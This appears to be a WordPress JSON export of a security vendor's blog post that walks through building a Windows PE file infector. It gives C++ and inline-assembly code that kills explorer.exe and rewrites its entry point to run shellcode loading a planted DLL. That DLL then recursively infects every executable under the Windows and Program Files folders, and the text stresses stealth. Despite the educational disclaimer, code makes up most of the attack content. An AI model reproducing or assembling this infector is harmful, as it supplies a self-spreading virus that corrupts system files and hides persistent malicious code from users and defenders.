{"id":179,"date":"2014-02-07T12:48:11","date_gmt":"2014-02-07T12:48:11","guid":{"rendered":"http:\/\/www.adlice.com\/?p=179"},"modified":"2022-12-21T10:40:27","modified_gmt":"2022-12-21T10:40:27","slug":"chronicles-pe-infector","status":"publish","type":"post","link":"https:\/\/www.adlice.com\/de\/chronicles-pe-infector\/","title":{"rendered":"Chronicles of a PE Infector"},"content":{"rendered":"\n

[INFO] This is a blog post moved from original location<\/a><\/strong><\/p>\n\n\n\n

Recently while roaming on forums I came across a basic tutorial on “how to make a PE infector”. It was explaining how to modify a PE (.exe or .dll) in order to execute some custom code at its startup (it was a MessageBox “Hello world”). I tried it, and indeed it was easy. So to go further I wanted to implement a true PE infector, able to replicate itself in other files …<\/strong><\/p>\n\n\n\n

DISCLAIMER!<\/strong><\/p>\n\n\n\n

This is not a “how to” to make a virus.<\/strong> This is a detailed analysis to explain how viruses (and especially PE-infectors) work. You cannot use this to propagate virus<\/strong>. These technical is known for years by malware editors, so this is only to help “good” people to understand how they work. We cannot be responsible for damaged caused by this code on your or someone’s computer. You use it at your own risk.<\/strong><\/p>\n\n\n\n


Scheme of attack<\/h4>\n\n\n\n

Basically, the main idea is to redirect the PE execution flow from the entry point (EP) to an injected section of code (ShellCode)<\/strong>. Then, the ShellCode must call the previous entry point (EP). This will allow the attacker to execute some code before the PE accesses its own. Here’s a schematic :
 <\/p>\n\n\n\n

\"Left<\/a>
Left : before patching – Right : after patching<\/figcaption><\/figure>\n\n\n\n


Infect an executable<\/h4>\n\n\n\n

Once the routine to infect a PE is done, we can schedule a macro attack over the system<\/strong>. To do this, we will act in 2 times. The first step is to infect an important exe file : explorer.exe<\/strong>. As this file is protected (cause running), we will simply kill its process and infect the file. This will force the system to reload the file (infected this time) and will trigger the runtime patching.<\/p>\n\n\n\n

Here’s the code of the main. We basically get the path of explorer.exe, we kill it, wait half a second (the time for the kill to be done) and we infect it<\/strong>.<\/p>\n\n\n\n

int _tmain(int argc, _TCHAR* argv[])\n{\n TCHAR win[MAX_PATH] = L\"\";\n SHGetFolderPath(NULL,CSIDL_WINDOWS, NULL, SHGFP_TYPE_CURRENT, win); \/\/Windows\n  \n wstring Path = wstring(win) + L\"\\\\explorer.exe\";\n KillProcessByName(L\"explorer.exe\");\n Sleep(500);\n InfectPe(Path);\n  \n system(\"PAUSE\");\n return 0;\n}<\/code><\/pre>\n\n\n\n

Let’s see the InfectPE routine, step by step…<\/strong><\/p>\n\n\n\n
In order to compile those functions at the same place as they are in the source code, you need to remove the incremental linking from the linker options<\/strong> (thanks Shebaw).<\/p>\n\n\n\n
Here we simply get address and size of the ShellCode. The size is gotten by looking at the address of a virtual function called ShellCodeEnd<\/strong>, which is here only to mark the end of the ShellCode (see later)<\/p>\n\n\n\n
\/\/ Get addresses of shellcode\nDWORD start = (DWORD)ShellCode;\nDWORD end = (DWORD)ShellCodeEnd;\nDWORD stubLength = end - start; <\/code><\/pre>\n\n\n\n

We open the file to infect (explorer.exe) and we map its memory into our process context with READ and WRITE permission<\/strong>. Then we check if it’s a PE (portable executable) and we save the current entry point (EP).<\/p>\n\n\n\n
\/\/ Get addresses of shellcode\n\/\/ map file\nhFile = CreateFile(Path.c_str(), GENERIC_WRITE | GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);\n        \n\/\/ Get file size\nfsize = GetFileSize(hFile, 0);\n  \n\/\/ Create file mapping -- hFileMap\nhFileMap = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, fsize, NULL);\n    \n\/\/ Create Map -- hMap\nhMap = (LPBYTE)MapViewOfFile(hFileMap, FILE_MAP_ALL_ACCESS, 0, 0, fsize);\n      \n\/\/ check signatures -- must be a PE\npDosHeader = (PIMAGE_DOS_HEADER)hMap;\nif(pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) \n    goto cleanup;\n     \npNtHeaders = (PIMAGE_NT_HEADERS)((DWORD)hMap + pDosHeader->e_lfanew);\nif(pNtHeaders->Signature != IMAGE_NT_SIGNATURE) \n    goto cleanup;\n \n\/\/ Not dll\nif (pNtHeaders->FileHeader.Characteristics &amp; IMAGE_FILE_DLL\n &amp;&amp; pNtHeaders->FileHeader.Characteristics &amp; IMAGE_FILE_EXECUTABLE_IMAGE) \n    goto cleanup;\n  \n\/\/ get last section's header...\npSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)hMap + pDosHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS));\npSection = pSectionHeader;\npSection += (pNtHeaders->FileHeader.NumberOfSections - 1);\n     \n\/\/ save entrypoint\noep = oepRva = pNtHeaders->OptionalHeader.AddressOfEntryPoint;\noep += (pSectionHeader->PointerToRawData) - (pSectionHeader->VirtualAddress); <\/code><\/pre>\n\n\n\n

Now we are looking for a free space (code cave) to put our shellcode<\/strong>, based on the shellcode size. We just looking for a large enough place with bytes set to 0x0.<\/p>\n\n\n\n
\/\/ Get addresses of shellcode\n\/\/******************************************************\n\/\/ locate free space - code cave to write the shellcode\n\/\/******************************************************\nfor(i = pSection-&gt;PointerToRawData ; i != fsize ; i++)\n{\n  if((char*)hMap[i] == 0x00)\n  {\n   if(charcounter++ == stubLength + 24)\n   {\n    printf(\"[+] Code cave located @ 0x%08lX\\n\", i);\n    writeOffset = i;\n   }\n  }\n  else charcounter = 0;\n}\nif(charcounter == 0 || writeOffset == 0)\n{\n  printf(\"[-] Could not locate a big enough code cave\\n\");\n  goto cleanup;\n}\n     \n\/\/ decrement to rewind to the beg of the code cave\nwriteOffset -= stubLength;\n     \n\/\/ Allocate memory\nstub = (unsigned char *)malloc(stubLength + 1);\nif(!stub) goto cleanup;\n     \n\/\/ copy stub into a buffer\nmemcpy(stub, ShellCode, stubLength); \n<\/code><\/pre>\n\n\n\n
Then we fill the place holders of the Shellcode<\/strong>. By looking at the ShellCode (see below), you will see addresses initialized with 0xCCCCCCCC<\/strong>. This is a way to quickly find the datas we need to replace at runtime. Here we have 2 things to replace.<\/p>\n\n\n\n
* The address of the LoadLibrary function<\/strong>
* The initial Entry Point<\/strong><\/p>\n\n\n\n
\/\/ locate offsets of place holders in code\nfor(i = 0, charcounter = 0; i != stubLength; i++)\n{\n  if(stub[i] == 0xCC)\n  {\n     charcounter++;\n     if(charcounter == 4 &amp;&amp; callOffset == 0)   \/\/ First is call\n         callOffset = i - 3;\n     else if(charcounter == 4 &amp;&amp; oepOffset == 0)  \/\/ Second is OEP\n         oepOffset = i - 3;\n  }\n  else charcounter = 0;\n }\n  \n \/\/ check they're valid\n if(oepOffset == 0 || callOffset == 0)\n {\n  free(stub);\n  goto cleanup;\n }\n  \n \/\/******************************************************\n \/\/ Load Kernel32.dll to get LoadLibrary address\n \/\/******************************************************\n hKernel32 = LoadLibrary(L\"Kernel32.dll\");\n if(!hKernel32)\n {\n  free(stub);\n  printf(\"[-] Could not load Kernel32.dll\");\n  goto cleanup;\n }\n  \n \/\/ fill in place holders\n *(u_long *)(stub + oepOffset) = (oepRva + pNtHeaders-&gt;OptionalHeader.ImageBase);\n *(u_long *)(stub + callOffset) = ((DWORD)GetProcAddress(hKernel32, \"LoadLibraryA\"));\n FreeLibrary(hKernel32);\n<\/code><\/pre>\n\n\n\n
Finally, our ShellCode is ready. We simply write it into the code cave we have found<\/strong>, and we erase the original entry point with the address of the beginning of our ShellCode<\/strong>.<\/p>\n\n\n\n
\/\/ write stub\nmemcpy((PBYTE)hMap + writeOffset, stub, stubLength);\n  \n\/\/ rewrite entrypoint to point on shellcode\npNtHeaders-&gt;OptionalHeader.AddressOfEntryPoint = FileToVA(writeOffset, pNtHeaders) - pNtHeaders-&gt;OptionalHeader.ImageBase;\n  \n\/\/ set section size\npSection-&gt;Misc.VirtualSize += stubLength;\npSection-&gt;Characteristics |= IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE;\n  \n\/\/ cleanup\nprintf(\"[+] Stub written!!\\n[*] Cleaning up\\n\");\nfree(stub);\n  \ncleanup:\n \n\/\/ Write memory map back\nFlushViewOfFile(hMap, 0);\nUnmapViewOfFile(hMap);\n     \nSetFilePointer(hFile, fsize, NULL, FILE_BEGIN);\nSetEndOfFile(hFile);\nCloseHandle(hFileMap);\nCloseHandle(hFile);\n<\/code><\/pre>\n\n\n\n
Let’s see this famous ShellCode…
This a very basic trick. We call LoadLibray with the complete path of our injected DLL<\/strong>. This DLL will contain all the code we want to execute in the process’s context<\/strong>.<\/p>\n\n\n\n
__declspec(naked) void ShellCode()\n{\n __asm\n {\n  pushad                                \/\/ preserve our thread context\n  call GetBasePointer\n  GetBasePointer:\n  pop ebp\n  sub ebp, offset GetBasePointer        \/\/ delta offset trick.\n   \n  lea  eax, [ebp+szPath]                \/\/ Path param\n  push eax\n  mov  eax, 0xCCCCCCCC                  \/\/ pattern to fill with GetProcAddr(\"LoadLibrary\")\n  call eax\n  \n  popad                                 \/\/ restore our thread context\n  push 0xCCCCCCCC                       \/\/ push address of orignal entrypoint\n  retn                                  \/\/ retn used as jmp\n   \n  szPath:       \/\/ C:\\\\windows\\\\system32\\\\pe.dll\n   bb('C') bb(':') bb('\\\\') bb('w') bb('i') bb('n') bb('d') bb('o') bb('w') bb('s') bb('\\\\')\n   bb('s') bb('y') bb('s') bb('t') bb('e') bb('m') bb('3') bb('2') bb('\\\\') bb('p') bb('e')\n   bb('.') bb('d') bb('l') bb('l') bb(0)     \n }\n}\n\/\/ Here to mark the end of the shellcode\n__declspec(naked) void ShellCodeEnd()\n{\n \n}\n<\/code><\/pre>\n\n\n\n
Here’s what we’ve got at the execution :<\/strong>
 <\/p>\n\n\n\n
\"Explorer.exe<\/a>
Explorer.exe patching by the infector.exe<\/figcaption><\/figure>\n\n\n\n
A code cave has been found<\/strong>, and explorer.exe is infected<\/strong>. At its startup, it will execute our ShellCode and load the pe.dll library<\/strong> (that we copied into the good directory!)
 <\/p>\n\n\n\n
\"Explorer.exe<\/a>
Explorer.exe is injected with pe.dll<\/figcaption><\/figure>\n\n\n\n

Infect all executables<\/h4>\n\n\n\n
Don’t stop here \ud83d\ude42 <\/strong>
At this moment, explorer.exe is able to load our DLL at each startup<\/strong>. As Windows needs to start this program each time the system is loaded<\/strong>, we know that our code will be executed<\/strong>. By the way, having a thread into explorer.exe is one of the finest thing for an attacker because inconspicuous<\/strong>.<\/p>\n\n\n\n
Now, we will see how this DLL can be used to infect all executables and execute some custom code<\/strong> (depending on what you want). See this schematic:
 
\"Capture\"<\/a><\/p>\n\n\n\n
Let’s see the DLL’s code. <\/strong>
We simply Output a string at process attach<\/strong> (when the process loads the DLL) and we fire a new Thread to infect all PE’s<\/strong>.<\/p>\n\n\n\n
BOOL APIENTRY DllMain( HMODULE hModule,\n                       DWORD  ul_reason_for_call,\n                       LPVOID lpReserved )\n{\n DWORD ret = 0; \n switch (ul_reason_for_call)\n {\n  case DLL_PROCESS_ATTACH:\n    OutputDebugString(L\"I'm injected you know!\");\n \n    \/\/ Create Thread\n    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)InfectAllPe, 0, 0, &amp;ret);\n    break;\n\n  case DLL_THREAD_ATTACH:\n  case DLL_THREAD_DETACH:\n  case DLL_PROCESS_DETACH:\n    break;\n }\n return TRUE;\n}\n<\/code><\/pre>\n\n\n\n
The thread will iterate directories to find any .exe and patch it<\/strong>. We start at 2 strategic root directories : windir and programfiles<\/strong>. We also create a mutex on this thread because we don’t need each infected process to fire a mass infection over the system. With only one thread, it’s sufficient and stealthiest.<\/p>\n\n\n\n
void InfectAllPe()\n{\n HANDLE hMutex;\n TCHAR win[MAX_PATH] = L\"\", progs[MAX_PATH] = L\"\";\n \n \/\/ Create mutex - Return if already created.\n if (!CreateNamedMutex(L\"peinfector\", &amp;hMutex))\n  return;\n \n \/\/ Get %windir% and %progfiles%\n SHGetFolderPath(NULL,CSIDL_WINDOWS, NULL, SHGFP_TYPE_CURRENT, win); \/\/Windows\n SHGetFolderPath(NULL,CSIDL_PROGRAM_FILES, NULL, SHGFP_TYPE_CURRENT, progs); \/\/Program Files\n \n InfectDirectory(win);\n InfectDirectory(progs);\n \n \/\/ Release mutex\n ReleaseMutex(hMutex);\n}\n<\/code><\/pre>\n\n\n\n
The InfectDirectory function will iterate recursively files and subdirectories, triggering the InfectPE function<\/strong> for each file (this is the same function as before). I’ve added a Sleep to relax CPU as this task can be long. The quietest we are, the best it is.<\/p>\n\n\n\n
void InfectDirectory(wstring const&amp; path)\n{\n WIN32_FIND_DATA ffd;\n HANDLE hFind = INVALID_HANDLE_VALUE;\n \n \/\/ Build search dir\n wstring pathDir = path + L\"\\\\*\";\n \n \/\/ Find the first file in the directory.\n hFind = FindFirstFile(pathDir.c_str(), &amp;ffd);\n \n \/\/ No files\n if (INVALID_HANDLE_VALUE == hFind) return;\n \n \/\/ Loop\n do\n {\n   if (!_tcsicmp(ffd.cFileName, L\".\") || !_tcsicmp(ffd.cFileName, L\"..\"))\n     continue;\n \n   \/\/ Directories\n   else if ((ffd.dwFileAttributes &amp; FILE_ATTRIBUTE_DIRECTORY))\n   {\n     \/\/ get full path of directory\n     pathDir = path + L\"\\\\\" + wstring(ffd.cFileName);\n \n     \/\/ Iterate inside\n     InfectDirectory(pathDir);\n   }\n \n   \/\/ Files\n   else if (!(ffd.dwFileAttributes &amp; FILE_ATTRIBUTE_DIRECTORY))\n   {\n     \/\/ get full path of file\n     pathDir = path + L\"\\\\\" + wstring(ffd.cFileName);\n    \n     \/\/ Infect file\n     InfectPe(pathDir);\n   }\n \n   \/\/ To not occupy all CPU\n   Sleep(50);\n \n }\/\/ fin do\n while (FindNextFile(hFind, &amp;ffd) != 0);\n FindClose(hFind);\n}\n<\/code><\/pre>\n\n\n\n
Here’s what we’ve got once Explorer has loaded the DLL :<\/strong>
 <\/p>\n\n\n\n
\"File<\/a>
File infection<\/figcaption><\/figure>\n\n\n\n
And after several minutes:
 
\"Capture4\"<\/a><\/p>\n\n\n\n

Conclusion<\/h4>\n\n\n\n
At this time, every .exe under Windir and Program File is infected to load our dll at startup.<\/strong>
Our DLL does nothing else than infecting other files. But we can simply add a Thread after our infection routine to execute some custom code with process’s privileges.<\/strong><\/p>\n\n\n\n
BOOL APIENTRY DllMain( HMODULE hModule,\n                       DWORD  ul_reason_for_call,\n                       LPVOID lpReserved )\n{\n DWORD ret = 0; \n switch (ul_reason_for_call)\n {\n   case DLL_PROCESS_ATTACH:\n     OutputDebugString(L\"I'm injected you know!\"); \n     \/\/ Create Thread\n     CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)InfectAllPe, 0, 0, &amp;ret);\n     CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)CustomRoutine, 0, 0, &amp;ret);\n     break;\n  case DLL_THREAD_ATTACH:\n  case DLL_THREAD_DETACH:\n  case DLL_PROCESS_DETACH:\n     break;\n }\n return TRUE;\n}\n<\/code><\/pre>\n\n\n\n
* No suspicious process<\/strong>, only a DLL thread executed by a legit process<\/strong> (explorer.exe)
* No suspicious autostart entry<\/strong> (RUN, task, file in the startup folder, …), only an entry point hijack<\/strong> into an essential system file.<\/p>\n\n\n\n
This make the infection stealthier<\/strong>, and harder to detect. However, a simple HASH check will reveal a problem into some system files.<\/p>\n\n\n\n
NOTE: All has come from a thread on Rohitab.com. See the link below.<\/strong>
Code is from KOrUPt. Thanks to him!<\/p>\n\n\n\n
NOTE 2: I do not provide any full source or binary, because I don’t want script kiddies to copy\/paste it and\/or use it to put some badness over the internet. Those who can understand and compile this code are smart enough to know what is bad and what is not.<\/strong><\/p>\n\n\n\n

Links<\/h4>\n\n\n\n
Rohitab: http:\/\/www.rohitab.com\/discuss\/topic\/33006-detailed-guide-to-pe-infection\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
Writing and Analysis of a portable executable (PE) infector. Educational tutorial on how to write your own PE infector that remains hidden in the system.<\/p>\n","protected":false},"author":1,"featured_media":181,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[84],"tags":[7,155,154,149,6,88],"class_list":["post-179","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-tutorial","tag-analysis","tag-c","tag-infector","tag-patch","tag-pe","tag-portable-executable","category-84","description-off"],"views":1744,"yoast_score":69,"yoast_readable":30,"featured_image_src":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture-2.png","author_info":{"display_name":"tigzy","author_link":"https:\/\/www.adlice.com\/de\/author\/tigzy\/"},"yoast_head":"\nChronicles of a PE Infector | Patching Legit Files \u2022 Adlice Software<\/title>\n<meta name=\"description\" content=\"Writing and Analysis of a portable executable (PE) infector. Educational tutorial on how to write PE infector that remains hidden.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.adlice.com\/chronicles-pe-infector\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Chronicles of a PE Infector | Patching Legit Files \u2022 Adlice Software\" \/>\n<meta property=\"og:description\" content=\"Writing and Analysis of a portable executable (PE) infector. Educational tutorial on how to write PE infector that remains hidden.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.adlice.com\/chronicles-pe-infector\/\" \/>\n<meta property=\"og:site_name\" content=\"Adlice Software\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/RogueKiller\" \/>\n<meta property=\"article:published_time\" content=\"2014-02-07T12:48:11+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-12-21T10:40:27+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture-2.png\" \/>\n\t<meta property=\"og:image:width\" content=\"892\" \/>\n\t<meta property=\"og:image:height\" content=\"658\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"tigzy\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@AdliceSoftware\" \/>\n<meta name=\"twitter:site\" content=\"@AdliceSoftware\" \/>\n<meta name=\"twitter:label1\" content=\"Verfasst von\" \/>\n\t<meta name=\"twitter:data1\" content=\"tigzy\" \/>\n\t<meta name=\"twitter:label2\" content=\"Gesch\u00e4tzte Lesezeit\" \/>\n\t<meta name=\"twitter:data2\" content=\"10\u00a0Minuten\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.adlice.com\/chronicles-pe-infector\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.adlice.com\/chronicles-pe-infector\/\"},\"author\":{\"name\":\"tigzy\",\"@id\":\"https:\/\/www.adlice.com\/#\/schema\/person\/a02b30804320a4059d268dc2567a307d\"},\"headline\":\"Chronicles of a PE Infector\",\"datePublished\":\"2014-02-07T12:48:11+00:00\",\"dateModified\":\"2022-12-21T10:40:27+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.adlice.com\/chronicles-pe-infector\/\"},\"wordCount\":1094,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/www.adlice.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.adlice.com\/chronicles-pe-infector\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture-2.png\",\"keywords\":[\"analysis\",\"c++\",\"infector\",\"patch\",\"pe\",\"portable executable\"],\"articleSection\":[\"Tutorial\"],\"inLanguage\":\"de\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.adlice.com\/chronicles-pe-infector\/\",\"url\":\"https:\/\/www.adlice.com\/chronicles-pe-infector\/\",\"name\":\"Chronicles of a PE Infector | Patching Legit Files \u2022 Adlice Software\",\"isPartOf\":{\"@id\":\"https:\/\/www.adlice.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.adlice.com\/chronicles-pe-infector\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.adlice.com\/chronicles-pe-infector\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture-2.png\",\"datePublished\":\"2014-02-07T12:48:11+00:00\",\"dateModified\":\"2022-12-21T10:40:27+00:00\",\"description\":\"Writing and Analysis of a portable executable (PE) infector. Educational tutorial on how to write PE infector that remains hidden.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.adlice.com\/chronicles-pe-infector\/#breadcrumb\"},\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.adlice.com\/chronicles-pe-infector\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\/\/www.adlice.com\/chronicles-pe-infector\/#primaryimage\",\"url\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture-2.png\",\"contentUrl\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture-2.png\",\"width\":892,\"height\":658},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.adlice.com\/chronicles-pe-infector\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.adlice.com\/de\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Chronicles of a PE Infector\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.adlice.com\/#website\",\"url\":\"https:\/\/www.adlice.com\/\",\"name\":\"Adlice Software\",\"description\":\"Anti-malware and analysis tools\",\"publisher\":{\"@id\":\"https:\/\/www.adlice.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.adlice.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.adlice.com\/#organization\",\"name\":\"Adlice Software\",\"url\":\"https:\/\/www.adlice.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\/\/www.adlice.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2020\/05\/B1rTNpTG_400x40_10.png\",\"contentUrl\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2020\/05\/B1rTNpTG_400x40_10.png\",\"width\":276,\"height\":276,\"caption\":\"Adlice Software\"},\"image\":{\"@id\":\"https:\/\/www.adlice.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/RogueKiller\",\"https:\/\/x.com\/AdliceSoftware\",\"https:\/\/fr.linkedin.com\/company\/adlice-software\",\"https:\/\/www.youtube.com\/channel\/UC4CQ-gIZMGWxl-auf0QqYhQ\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.adlice.com\/#\/schema\/person\/a02b30804320a4059d268dc2567a307d\",\"name\":\"tigzy\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\/\/www.adlice.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/d81e380961b1b69969fa84994ad1e4cba26afe93a49d8dd3148e9c33ffe4ccac?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/d81e380961b1b69969fa84994ad1e4cba26afe93a49d8dd3148e9c33ffe4ccac?s=96&d=mm&r=g\",\"caption\":\"tigzy\"},\"description\":\"Founder and owner of Adlice Software, Tigzy started as lead developer on the popular Anti-malware called RogueKiller. Involved in all the Adlice projects as lead developer, Tigzy is also doing research and reverse engineering as well as writing blog posts.\",\"url\":\"https:\/\/www.adlice.com\/de\/author\/tigzy\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Chronicles of a PE Infector | Patching Legit Files \u2022 Adlice Software","description":"Writing and Analysis of a portable executable (PE) infector. Educational tutorial on how to write PE infector that remains hidden.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.adlice.com\/chronicles-pe-infector\/","og_locale":"de_DE","og_type":"article","og_title":"Chronicles of a PE Infector | Patching Legit Files \u2022 Adlice Software","og_description":"Writing and Analysis of a portable executable (PE) infector. Educational tutorial on how to write PE infector that remains hidden.","og_url":"https:\/\/www.adlice.com\/chronicles-pe-infector\/","og_site_name":"Adlice Software","article_publisher":"https:\/\/www.facebook.com\/RogueKiller","article_published_time":"2014-02-07T12:48:11+00:00","article_modified_time":"2022-12-21T10:40:27+00:00","og_image":[{"width":892,"height":658,"url":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture-2.png","type":"image\/png"}],"author":"tigzy","twitter_card":"summary_large_image","twitter_creator":"@AdliceSoftware","twitter_site":"@AdliceSoftware","twitter_misc":{"Verfasst von":"tigzy","Gesch\u00e4tzte Lesezeit":"10\u00a0Minuten"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.adlice.com\/chronicles-pe-infector\/#article","isPartOf":{"@id":"https:\/\/www.adlice.com\/chronicles-pe-infector\/"},"author":{"name":"tigzy","@id":"https:\/\/www.adlice.com\/#\/schema\/person\/a02b30804320a4059d268dc2567a307d"},"headline":"Chronicles of a PE Infector","datePublished":"2014-02-07T12:48:11+00:00","dateModified":"2022-12-21T10:40:27+00:00","mainEntityOfPage":{"@id":"https:\/\/www.adlice.com\/chronicles-pe-infector\/"},"wordCount":1094,"commentCount":0,"publisher":{"@id":"https:\/\/www.adlice.com\/#organization"},"image":{"@id":"https:\/\/www.adlice.com\/chronicles-pe-infector\/#primaryimage"},"thumbnailUrl":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture-2.png","keywords":["analysis","c++","infector","patch","pe","portable executable"],"articleSection":["Tutorial"],"inLanguage":"de"},{"@type":"WebPage","@id":"https:\/\/www.adlice.com\/chronicles-pe-infector\/","url":"https:\/\/www.adlice.com\/chronicles-pe-infector\/","name":"Chronicles of a PE Infector | Patching Legit Files \u2022 Adlice Software","isPartOf":{"@id":"https:\/\/www.adlice.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.adlice.com\/chronicles-pe-infector\/#primaryimage"},"image":{"@id":"https:\/\/www.adlice.com\/chronicles-pe-infector\/#primaryimage"},"thumbnailUrl":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture-2.png","datePublished":"2014-02-07T12:48:11+00:00","dateModified":"2022-12-21T10:40:27+00:00","description":"Writing and Analysis of a portable executable (PE) infector. Educational tutorial on how to write PE infector that remains hidden.","breadcrumb":{"@id":"https:\/\/www.adlice.com\/chronicles-pe-infector\/#breadcrumb"},"inLanguage":"de","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.adlice.com\/chronicles-pe-infector\/"]}]},{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/www.adlice.com\/chronicles-pe-infector\/#primaryimage","url":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture-2.png","contentUrl":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture-2.png","width":892,"height":658},{"@type":"BreadcrumbList","@id":"https:\/\/www.adlice.com\/chronicles-pe-infector\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.adlice.com\/de\/"},{"@type":"ListItem","position":2,"name":"Chronicles of a PE Infector"}]},{"@type":"WebSite","@id":"https:\/\/www.adlice.com\/#website","url":"https:\/\/www.adlice.com\/","name":"Adlice Software","description":"Anti-malware and analysis tools","publisher":{"@id":"https:\/\/www.adlice.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.adlice.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de"},{"@type":"Organization","@id":"https:\/\/www.adlice.com\/#organization","name":"Adlice Software","url":"https:\/\/www.adlice.com\/","logo":{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/www.adlice.com\/#\/schema\/logo\/image\/","url":"https:\/\/www.adlice.com\/wp-content\/uploads\/2020\/05\/B1rTNpTG_400x40_10.png","contentUrl":"https:\/\/www.adlice.com\/wp-content\/uploads\/2020\/05\/B1rTNpTG_400x40_10.png","width":276,"height":276,"caption":"Adlice 